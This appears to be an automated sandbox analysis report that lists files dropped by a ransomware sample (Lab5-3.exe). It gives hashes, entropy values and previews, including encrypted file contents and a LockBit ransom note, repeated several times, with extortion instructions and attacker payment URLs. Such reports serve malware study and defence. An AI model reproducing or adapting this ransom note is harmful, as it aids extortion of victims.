                                                                                                          Preview:q.......B.O..(x........|.j.Ise.... N".....T...(>..R...n...)D....~i.w.+.~...)..#.L.M.u.....k$9p.........TQ......s...#y..Q.[.h...rQ.T..h}..!..Xz.9}C/.3...@..@...f.9.........w.-..op...c.D.U3G...o.^>........u..|;"..S.[a..y....A.S..qh..k,.H.........Px..K.>h.....J.....|.d..q...!s..B....|d.b..(.U.w1..........&...._....QQ.t.+.`....P>AN.3.i.Mi.N.......9z'..C....t...DJ.....li.dj..V....N...&0.....|}.(.....{,.q|...9..?.l_J.7V.Ku..Cf.vl]..S..Je.!FE.k+(......X.M6V=.....w..6...#ri...|.l.qLy..j..a:.XD..<X..rq..JS.Y...J8.>g..U.rY68c.}6..cTF.I.9...... ..[tHqv.6Uw.w.~3...].-.$*.;.n..I..(.!.;.G....(..l.az..\\M{.Ny.dR...=...y.oz..S...u..@Vjs.}...|..t.........w.'}.-.G.!OE....<t...OD7..%%.?.sQ.=v}..J...>[.O.r.....r..d....u....@q....j.BM`$1.P.X..G..o?...{.'+.(.......L..e...JS....10.q022.~ .vykx.....v...i..*..........4{.:5(......vEj..Cs......,.}r..$..n........K.)...)b</.]...pA.....<....d...t..V.0Z.$.kt......]r...}.M,...oZ|.9......+0X:.....o)q$......\..KJ..W..m.|.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.941121416795335
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:nCE7/uDTaKPm3zbtLWqox0Hkp2JBgVHfUTid3hBaUoSGFcmeykEdEElU92i:1uSiaJE0Hkp2JB5Gx0uKeY2ElUJ
                                                                                                          MD5:B37E463B81B5CAD169D90976427B55A1
                                                                                                          SHA1:29EF6E2126E9557371F5151B841E81F8C91CA6BB
                                                                                                          SHA-256:800834AAF5837378C3BB2D707B98813B8BBA6C592428F2B4C018232D2C7D03D6
                                                                                                          SHA-512:FF72C1A3BB0F349AD07CFB7D2FF7587C96AAD22C5B82A71DBE70D2191E7C262E9F1BDBC5727C18B264593B1E3A6D7D5CD09238B65547380B0FBEECAAD34DCC8C
                                                                                                          Malicious:false
                                                                                                          Preview:Wa....A*.....D_.....g.).o>'S...Y...[[.YS.|..4J../i.Je..4A...~&.h...t.....c.r..._q.~p..9...t-..d.,..#.E....c... ....t`k......V....>|.F(..g.l.f...~)......d.en.Y..h..p.V..M7N..p.#....AW..B..%..je....8.......#...../.......l..<g..m..s.<..]....K?Qb.n..N...>4........Ax]h..Y.q."...4.....?c..iW..i.T(..C...-|q9...B.f..M.....4. ..d._...S.!.LC..C.%0y....5~J.9..\kJ..e..W.......#..r:.D..gy.Ch.$.+.-...&!L.L,...d...Ct.S.d.I...X.mz...3O.-..C......wg. ~..O>..?.=u].p..YGjv]..W....@..../.....e..Y..S-....u.....f.o.Q@.(.'..B..@..#i..0CH..<yP.@yb.#f...#..pW......M.w{%..<..'....H9...7.(P.?......[~s".!Z.x:..Gl<.....;`...|....4....r.m...@.R?....A.j.<.....3.cyk.....o|..b.....s.{l..1.(g...fz...(..z...\9,....q(b.]C.'..`...95..L...t..G..i3....I..N..D...Hi.o...u..Gw.n.jNI.d...|..O.....P.U..?.c..w.....hT...ek.~.2."...~........w.Y.0P..p.1.kD....n?......p.4.....&....8..zB...FD..-....g{.3..eY..x7.,....g.\..\...F.0..5h.!H......y{0O.>.%v.!.?D.....R2".. ...&....].&..:m....;.S.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2720
                                                                                                          Entropy (8bit):7.934995816346062
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lbULobFiWAOADEal+slHfUTid3hBaUoSGFcmeykEdEElU92i:FbFy1DEalEGx0uKeY2ElUJ
                                                                                                          MD5:938FAC7EAEBD635B20BD1461D8B86166
                                                                                                          SHA1:91EBE526D4B67C4E070A2D985B7ED6EFAC375208
                                                                                                          SHA-256:0961BDFCBE7753C5D1AD05D7565C77C9664E8B58128D76E40E00C94995BFF188
                                                                                                          SHA-512:441D3EC97E6142E796191C8FA350A7EFAC231CC5F4D4D0DE3AA001CDB2635BDEDD71462B7F73D4A276C6161FC1883BDA8136E4D3227985AFB55543CDF405F958
                                                                                                          Malicious:false
                                                                                                          Preview:q......`C....B`.#[....At/..........r$.fL.e.bFa.h.f...d.u........"8.5....vv.L.......=_{>..;...h}.o..}......`M.X....>h..<>......!.....iQg:l%...L..-.s.OelW....(.sUMx....=..k%k:.iBt..%.....%p..T.@]..p...._<z....o.3....{9.I....|....3n...i2...+.3..{.A...............$.D.....=..Z...4.."...2J...[...\...).g.S...|.........y.[y5c.4..z../_........=....3..j]4..,.B...I..D.P...E.+....../..m.).f..G.Z.m..G..6...d.d)...O[.....=..I1....2.'N...*.._lH..E6.R.,.W...zl.X.b.t..km..$T..$....?r......P..S./....X%......D...s.......V.z.b*.j...-.&.<..4.f..f.W...Re;...I.V...cg..;?c.n.. s.~.....n....[#.......cF.=@d.%s\.....T..zO.f...........Ba.dbDq.1.....>...g.J.C..S0.[.Q..*......}.......kqO..u...-...`...@.S_...E...(.;..}.....aG....&e.l....<c.( .J.....}>At...j...$.....?E..t....*.....x=..i&........AK.^`.x._.......|z..3Z.M.%....oN..C..u?...;47..6d9.>Zy,..N`......P=.b....(../kCVu....l"3T.w%pU....u......Qv..l^H.IY.....>1..ou..E....hd1.#P.e$8V.m.....l.^..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.934029496980252
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6mX0ggDwpE7zvmSWhTSboD4HHOWmVx8tZHfUTid3hBaUoSGFcmeykEdEElU92i:6mowpE7z6hTSboDJZ8taGx0uKeY2ElUJ
                                                                                                          MD5:057F9451340565D650058002B9EE3893
                                                                                                          SHA1:2BD19FB2C05A37A3D56D5EBA54AC31F5650ABE5B
                                                                                                          SHA-256:B39BDB5D092362827402FAFE6A13A79E4C3583D4E04C4338A7DB674E70392977
                                                                                                          SHA-512:0121C7431A7827C33952DEB848E1199D58A50065CC8615A1864D520FA9F253DB31D399CE5FAE6CD997AB2AF79A971EE9E4CAF068A0088791CFC3940432A6A327
                                                                                                          Malicious:false
                                                                                                          Preview:27u..'..A../0.f....1...F|.V.9._.O-.....}.X....`.2.&....0(.........0L?...b.....u.....Hi.!.O..).>.o......./cD..RYp...........0R..(..ahO.1..=h......E...pc...9.|...O.nTD`_.@....&.S@8.THn.S8...-.s.C$...V7,.M....t..0z..g......{.\C{+NU...5M.L..&.....f..O........^.G.6...G...D.-.h.[...1.1`h....O....h.....y.[T.1.l......e.A.'G.s......RB....Q.L.../..L.P..d?...>s....-.......L...R2S .ze6...e..{.....$.m.0.iA.d?...!....O%....#0..m..B=.l.k/A.........qa/2..K..x...S|.[.lNc.w...k...B..[.a.1......p.X.._.....C.<4......3....C....I.F.T*99..e.%"9..X.ae......c6.R....6.!b..I..}i..^..g...w....N..........?.....Pa...7^..c......i..<.R.e.n.y.E?+.~..........{...G.(..q.t.{...x.Fwx..&..p^H......b.4.3.&.......?0zy.8..Y!.Q.a`f. .<.@.P6..+$G,..52...v........q.0MQ..K.~..0..1......p...L2.u...}.Cdl.k.....3...%EZ.j*J.....*..1.q..a.\....v...^....g.9..p..]...S..F...e<SK...#.8v..x......8}.....$9..J..k......x.}4.Y.=i...&0...%..vPU#..1Z......3........;....R.1\#...1.w.>..T4&49......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.929284063054677
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:UufBpfWGovXt8MdtdQMjr5MOAypHfUTid3hBaUoSGFcmeykEdEElU92i:ztOt8MdzQM36OQGx0uKeY2ElUJ
                                                                                                          MD5:00171B25493DD1ABB497F413AF2588E3
                                                                                                          SHA1:81099A0F414E8D7C11AED3340EAC0EBBF75D1190
                                                                                                          SHA-256:F45E027ADCA6CE3D959E04C5F453B83426A42FD227CD6E4FF06C0C42364233F8
                                                                                                          SHA-512:7E88603842C030C9AB06CDC3C0A25972DCD3219CC1F4A7981ADA6A6AE4745B1A5C9EB1AD20F77027D46D8F9A2C23C0939B33F5485503D28E05601A8CB5BA1B4E
                                                                                                          Malicious:false
                                                                                                          Preview:Ro..[...[.F...)4yj....B...#.{.....[=..KaT`...x...H.....%J.$e.I/.].CU&....-.{R..Q.1..>..@..F.+..n>G*.....|...%...R...R%1.A%..!...@.~.}9..So.5..> .D+..7.X.S.....)Fl..9..T.!L....4.....:\m......B.z-.o.s]0ez..f...mg..|k0...s...?."z.&.t..JTLY...y.@.....b...:..I....Xvi.....$Bm..|M`s./.V=..A....^.w.S....>...`.Ho.Y.tI.k.|.$......8-SK!xII....YERK.X.D.l$N........q.h......EmXu.Kv=.K.u...m....Fa..>..~.v.V."..._.. ......t....[fE....h...T.'...k.>.9.....Y<...I...K.b\"H.....A.DLd.V..L.l.h.3,~...S....[M.KR}.g....h.....W>.\Z..:m.4$..?wT...1;<..^...A...:.....q....9'....".@...wT.....+(.=..l...]..t{G..x.......`V.u.x..5.#.0H>.....}....(....h{....z,..=....P..4U^..X.w%m|4...~..I....b...)..&y...<4.v...r.P....% oY.2.~.Y./@..X..p..et..i.bI/..@+D.H....;<a......6....2.:.......H...A,..2...D..Q.@.?...-)........8..W370_.zt.4...z.8?.rC....&._5.Oc........Y.....3.......%.!%.5..%......X.zR...7Q.....e..BW.W....,....*-.n.;6.wr.C.~..t.za.n..`....k.../."..m......I....=.A.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2784
                                                                                                          Entropy (8bit):7.929113916209425
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:t2hfA/HAgo9LLonlW0oN4ek8nlHQUWcXeVvgHfUTid3hBaUoSGFcmeykEdEElU93:UhovmLhB48lHQUcnGx0uKeY2ElUJ
                                                                                                          MD5:665ACD56CA08762E58A8C7E58F548A22
                                                                                                          SHA1:022FECB02A13A854DD3F6142CFE4DF655B03F5E8
                                                                                                          SHA-256:19715ADD9BF5525C719CF225A7887C59C60607798111DA7627FA176B22242B89
                                                                                                          SHA-512:E1E9A7DC9886698C49DE81694EC69E774D6EB19EAA390F154E0A15E49F9BF747C2A688ED267EC55C98FA21E35E10578EAF9BED41459F52424317CD38F73F9A49
                                                                                                          Malicious:false
                                                                                                          Preview:..s@...T....q..e......q+*.&O..k...?........z#.......8l...#.Y!.;C...v.....'...T...i<.4.......Dt.CojV.......m.....N.G...W.W .b.........;:w...v.....;{...``...O.SO.Z.}j..h;9b(...).nq...X.........sHG.....k.T!a.....}z^...6:..c.E.@.w_.=?Gq.....o...1X.y"..wo..w..?gI.O.B...s.8..o.}:ud...:9F......-........*.X.u)...[k...R|.....(.y,..+d%..fW...4.8..c}.E"]....m>:,a....#i..,..........ss.....Mx.I.X...r.N=rQ.-.e..j<....q..y..k.Ps.>..Y.t.?.-(FV%_....B=B..}.5..b%W..i.7.;....8V..ys..0L.bYH.....{ue.n.%..gMy.xz*g&|.j.i7}.~uJ..!.z\."..=3....t..+.^+....,At#F..K.hF.FS|...O.Q.V...P.D...~.c.":..^....q..^.:.l..k{4.s'.W.....%....h...4......ws..I.W.)\:.A.....S..IF.>...g.w.8.b.Pe.h?..........M...-..0.5....o.5g.G..&...q....#B....;...V..hR...).o.....T...h\.y.+.*...T....Q.$9../...........8.+..-....~..y..Q.............|....(.y,..OF#.D*.a.T..I8 .....\...i...sK!....QH..k6..t.....&.y.I4...7.....W`i..l.>.$.....HqE.T..q..*"..O....-U.#.......]...+|Js..\.S#O....O.).l...F
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.944227693762022
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:nDrGQAm6tmNLQfT8UCkm5T+HfUTid3hBaUoSGFcmeykEdEElU92i:nDrGnSchCkYlGx0uKeY2ElUJ
                                                                                                          MD5:F7E598CC4B18061EAEAE368FAEA9B3C1
                                                                                                          SHA1:F45056A9B9D8B7CE288B3FA9EAC5D9F56CB0F555
                                                                                                          SHA-256:B7E84B9CBA2A052D2BC45CED541A6DAF8A95507F7627E1DD999D8C5F909877BF
                                                                                                          SHA-512:76F56AFFF840A8B1D4DAE0D49262837DF98E4D43462A144BF048CECB70570673A134EF6411C34C9FCB97E6F445240598E4047D73B25B7E5DD28EEE952BABB013
                                                                                                          Malicious:false
                                                                                                          Preview:.. A.s......\J@....h.m..k..b.D1...+R...;u.U.`..&.W.Ah82J.....tw.At.s.9c..<....(.t.@......C.!.{..,........s..;...Y(.=.:.m.^i....W.........'.'....k...#.....R.+J-uG./..9..+..%..(Y...u. .T.~8..].9...../+g>#...I.w%..6.S.<.....T.w.;.....i......a......x.....%..&..R....x..8..Qw...T......}........3'd...L.oJJ..Th.t%p..M... =E. ....^.o.x..7..S@Jp;v].......v.....}].b.ZC(\.d5.v..!.fdO0i..[r,......NX.........F..-828.'.=f[..L....7..h.(w..........+/..#.c.@u.''H'&..)Or./..N.\.....l....r.e.E....).4..S..]0@z[Dz....\.^:Kb...3.........5..7K..p. ....!..{.../..F....$.v....P,<.|.t..n.........6..6.).Z ..o...C.A.../.ig.D.$......(.....~..>v...}.....&.vNp...B...,$..2..[d...A.G.|`...V..].o.....ps.d....G....3.l..(C. .|X.r..\u[..$....M.....g.@.O.C_uF....|..^}..].^.E.:..9r".....K?.^0..,;.?.....1..W........c.....M2.d.K.....p.^.I..$..N.`...AX..Q/gP.....V..=0~....U#K:.`...N....h.V..+......g.g.#..E...<2.Qk..$.w1.+.......:..1(A..x k..M.....G...H.RCF.....OM..a}....baY....Q...L.^....7a.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:Dyalog APL component file under construction version 67.-37
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2736
                                                                                                          Entropy (8bit):7.934983089586507
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:bdcnAsENVnbYli2xS2FEfk9xvwE02gfloZ5dJdXFjHfUTid3hBaUoSGFcmeykEdM:bdMw7nmxS2FEfk9ZweOlCfZwGx0uKeYO
                                                                                                          MD5:A9B553BBD4DE736A7688E59C9FBD4C25
                                                                                                          SHA1:DF6AA5E17B5DA863C247499E0A8D241E66414CBC
                                                                                                          SHA-256:0E1F2B50910EADD89A2F5A8B551CFA8028F912F10C1F4D279511111AB3690F84
                                                                                                          SHA-512:9F4A29396BA7CBD527D5B9BB84E46DB077CC6FF6820A7015AD4B17A1D66A8862B72B81433936E6C9465E34F7D811B5E8B6C00DDBC0B062AF8542F79ECF84C01A
                                                                                                          Malicious:false
                                                                                                          Preview:..C..1..8..zt}.]d_F.V.f.l(...J...P...}..+..D..f`....X-.%....1...q;..Z..+..U........%.N.Z.J}.......?.....Z5...........*W....h.R..w....g....S...>.|.L...X......Y&...&f.Y.6i.?j..{.+.a.G3...l...z....Fe...j. Yd...+....+(D...E..Q...[...x?.:.......X....m....!I..t...a.OU.UD.G......y....x *.C.B0........n..uR2...(T2 *x.Y..0.4...(~..%_.....^..4.#u4...L.~....eGe.....[...Bb..{:\...G..U.~....Z..q..8..^.Z.!.aN..mpo..g4......$../N.5..d....?6........,h.k..p.._<.W.x..i6.C.....*_....w..&..w.g%.......8..S....0..(?.....UNx.`q....z.....#..F....<!.>7.a....c=f3..P..>a.._0...d....?.T..G.)..r.`~.Dp.......z>..[.,..>_...7..c....<.....<.........$..8....J.zV.;....v.+).3...8...4.UXBO.B[u..].......~.....f.%......7.>|........7m..}.A.q...:..T8...57........&P.X..aE%......9.:..9.P.!<..'.s..~.Jt|....Kq*..X......a....D.(4.7.C...vH....I..Y.?...i.a....>......+........fO..M.\.e.^}.!. .4.F.e...&.]...L...h.gF......r..w%....S;........sB.wv.E......o.............d..nfE..:.b..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
